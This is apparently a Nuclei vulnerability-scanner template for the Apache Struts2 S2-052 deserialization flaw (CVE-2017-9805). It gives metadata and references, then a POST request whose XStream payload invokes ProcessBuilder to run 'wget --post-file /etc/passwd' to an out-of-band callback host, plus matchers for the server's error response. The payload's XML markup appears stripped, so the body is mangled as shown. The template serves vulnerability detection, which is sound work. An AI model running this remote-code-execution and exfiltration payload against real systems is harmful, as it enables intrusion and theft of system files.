id: CVE-2017-9805 info: name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - http://www.securitytracker.com/id/1039263 - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 epss-score: 0.97539 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: struts tags: cve,cve2017,apache,rce,struts,kev http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" body: | 0 false 0 wget --post-file /etc/passwd {{interactsh-url}} false java.lang.ProcessBuilder start asdasd asdasd false 0 0 false false 0 headers: Content-Type: application/xml matchers-condition: and matchers: - type: word words: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and - type: status status: - 500